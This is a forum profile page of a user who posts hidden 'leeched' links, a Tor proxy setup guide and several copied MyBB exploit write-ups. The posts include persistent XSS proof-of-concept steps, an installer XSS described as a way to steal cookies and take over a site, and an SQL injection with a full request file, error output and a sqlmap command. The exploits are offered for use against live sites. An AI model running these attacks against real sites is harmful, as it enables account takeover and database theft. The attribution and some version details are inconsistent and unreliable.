mesvak

Members
  • Content Count: 2,693
  • Days Won: 5
Everything posted by mesvak

  1. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  2. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  3. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  4. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  5. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  6. [hide] https://mega.nz/#F!qiYiUa4K!aCn1t5uDGw6_XaSS10j6DA [/hide] ENJOI UR ASS LILS Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  7. [hide]
     1- first of all you needa dl the program that i provided for ya below JDEV FOR NETWORK tHEN INSTALL IT PRESS NEXT NEXT NEXT ,.... TILL ITS DONE
     2- OPEN CHROME AND GO TO THIS SITE https://chrome.google.com/webstore/detail/falcon-proxy/gchhimlnjdafdlkojbffdkogjhhkdepf/related?hl=EN https://pasteboard.co/I5hck6P.png
     3- install falcon proxy as you can see above
     4- then move on to falcon proxy and click on it , click create a new one and fill it like this
        type>>sock5
        Ip>> 127.0.0.1
        port>>9050
        rest of em dont matter
        https://pasteboard.co/I5hdauR.png
     5- then press create and activate this bullshit like this https://pasteboard.co/I5he7Qq.png
     6- now the fucking theory is done now lets test go to this site while proxy falcon is online https://dnsleaktest.com/ Then press extended one not standard wait till u get all the results if u are doing right u needa get to many ip adress like this https://pasteboard.co/I5hf0Bf.png this means u are done and you can go to onion shits like this one zial32pytl.onion or......
     [/hide]
     PROGRAM: [hide] JDEV TOR NETWORK : LINK [/hide]
     Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  8. [hide] [/hide] enjoI Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  9. [hide] hacked and fucked site THIS IS LIE TO BE ME SECOND PART [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD MY iNStagram Id : mesvak
  10. PLS READ WATEVER INSIDE THE CODE SECTION ''No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account.'' and THE SHITTY THING IS Y OU CAN EVEN INSTALL WATEVER MYBB VERSION U WANT AND EVEN CREATE HOST AND BE ABLE TO TAKE THE DB ON THAT SHIT PLS READ THAN TALK :kappa:
  11. [hide]
      # Exploit Title: MyBB Thank Like Plugin 3.0.0 - XSS
      # Date: 10/3/2018
      # Author: Mesvak
      # Version: 3.0.0
      # Tested on: KALI
      # CVE: CVE-2018-14888
      1. Description:
      This plugin allows users to thank/like other users threads/posts. In user profiles it shows your most liked post/thread, the post/thread subjects aren't sanitized to user input.
      2. Proof of Concept:
      - Use the following as the post/thread subject
      - Get that post/thread liked by another user (or you)
      - Visit your profile to see alert.
      [/hide]
      soLUTION IS UPDATING TO NEW VERSION OF ASS Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  12. [hide]
      # Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
      # Date: 4/20/2018
      # Author: Mesvak
      # Version: 1.1
      # Tested on: Ubuntu 17.10
      1. Description:
      Adds a new section to user profiles that will display their last posts.
      2. Proof of Concept: Persistent XSS
      - Create a thread with the following subject
      - Now visit your profile to see the alert.
      [/hide]
      SOLUTION
      [hide]
      ```
      $d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
      ```
      [/hide]
      Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  13. [hide]
      # Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS
      # Date: 3/15/2018
      # Author: 0xB9
      # Version: v1.3
      # Tested on: Ubuntu 17.10
      1. Description:
      When editing a thread the user is given to the option to convert the thread to a link.
      2. Proof of Concept: Persistent XSS
      - Edit a thread or post you've made
      - At the bottom of the edit page in the Thread Link box input the following ">
      - Now visit the forum your thread/post exists in to see the alert.
      [/hide]
      SOLUTION
      [hide]
      Patch in line 83:
      ```
      $thread['tlink'] = ($thread['tlink']);
      ```
      to
      ```
      $thread['tlink'] = htmlspecialchars_uni($thread['tlink']);
      ```
      [/hide]
      Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  14. [hide]
      # Exploit Title: MyBB Downloads 2.3 - SQL Injection
      # Date: 28-10-2018
      # Exploit Author: MEsvak lil ass
      # Contact: instagram.com/mesvak
      # Version: 2.0.3
      # Tested on: Ubuntu 18.04
      1. Description:
      It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.
      2. Proof of Concept: Persistent XSS
      - Go to downloads.php page
      - Create a New Download
      - Add the following to the title: a"
      - Now on submit, the user will be prompted to an SQL Injection specific error.
      ```
      MyBB has experienced an internal SQL error and cannot continue.
      SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1
      Query: SELECT * FROM mybb_downloads WHERE name="a""
      ```
      - THis can be exploited with: sqlmap -r request_file -p name --threads 5
      3. Request File example:
      ```
      POST /downloads.php?newdownload=1 HTTP/1.1
      Host: localhost:8081
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://localhost:8081/downloads.php?newdownload=1
      Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160
      Content-Length: 1029
      Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow
      Connection: close
      Upgrade-Insecure-Requests: 1
      Cache-Control: max-age=0

      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="my_post_key"

      6cb47e578ed16aa5272c55b0cb8745b4
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="name"

      a"
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="shortdesc"

      test
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="description"

      test
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="image"

      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="url"

      1
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="numimages"

      4
      -----------------------------171894060312075061251712806160
      Content-Disposition: form-data; name="submit"

      Publish download
      -----------------------------171894060312075061251712806160--
      ```
      [/hide]
      this is the plugin that must be on the mybb site to be injected by shitty ass exploit link Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  15. [hide]
      Exploit Title: XSS in MyBB up to 1.8.13 via installer
      # Date: Found on 05-29-2017
      # Exploit Author: Mesvak
      # Version: Version > 1.8.13
      No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account.
      The vulnerability occurs in /install/index.php:2503 and occurs because there is no html encoding of the $error.
      A simple way to exploit this is to create an error by using the Database Server Hostname and inserting HTML characters there. It is a POST XSS and this is a PoC:
      Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
      A simple fix would be to change the function error_list($array) to:
      ```
      function error_list($array)
      {
          $string = "<ul>\n";
          foreach($array as $error)
          {
              // Escape each error message before it is written into the list
              $string .= "<li>";
              $string .= htmlspecialchars($error);
              $string .= "</li>";
          }
          $string .= "</ul>\n";
          return $string;
      }
      ```
      [/hide]
      WELP as far as ik they already fixed this Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  16. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  17. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  18. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  19. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  20. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  21. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  22. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  23. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  24. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  25. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils